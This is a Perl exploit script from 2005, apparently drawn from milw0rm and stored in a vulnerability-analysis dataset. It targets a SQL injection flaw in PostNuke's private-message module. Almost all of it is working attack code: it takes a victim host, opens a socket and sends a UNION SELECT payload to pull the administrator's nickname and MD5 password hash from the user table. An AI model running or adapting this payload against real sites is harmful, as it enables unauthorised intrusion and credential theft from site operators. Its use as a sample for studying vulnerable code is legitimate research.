lilbool/vuln-code-analysis
0
1#!/usr/bin/perl
2# This tools is only for educational purpose
3#
4# K-C0d3r a x0n3-h4ck friend !!!
5#
6# This exploit should give admin nick and md5 password
7#
8#-=[ PostNuke SQL Injection version : x=> 0.750]=-
9#-=[ ]=-
10#-=[ Discovered by sp3x ]=-
11#-=[ Coded by K-C0d3r ]=-
12#-=[ irc.xoned.net #x0n3-h4ck to find me K-c0d3r[at]x0n3-h4ck.org]=-
13#
14# Greetz to mZ, 2b TUBE, off, rikky, milw0rm, str0ke
15#
16# !!! NOW IS PUBLIC (6-6-2005) !!!
17
18use IO::Socket;
19
20sub Usage {
21print STDERR "Usage: KCpnuke-xpl.pl <www.victim.com> </path/to/modules.php>\n";
22exit;
23}
24
25if (@ARGV < 2)
26{
27 Usage();
28}
29
30if (@ARGV > 2)
31{
32 Usage();
33}
34
35if (@ARGV == 2)
36{
37$host = @ARGV[0];
38$path = @ARGV[1];
39
40print "[K-C0d3r] PostNuke SQL Injection [x0n3-h4ck]\n";
41print "[+] Connecting to $host\n";
42
43$injection = "$host\/$path?";
44$injection .= "op=modload&name=Messages&file=readpmsg&start=0";
45$injection .= "%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null";
46$injection .= "%20FROM%20pn_users%20WHERE%20pn_uid=2\/*&total_messages=1";
47
48$socket = new IO::Socket::INET (PeerAddr => "$host",
49 PeerPort => 80,
50 Proto => 'tcp');
51 die unless $socket;
52
53print "[+] Injecting command ...\n";
54print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
55while (<$socket>)
56{
57 print $_;
58 exit;
59}
60}
61
62# milw0rm.com [2005-06-05]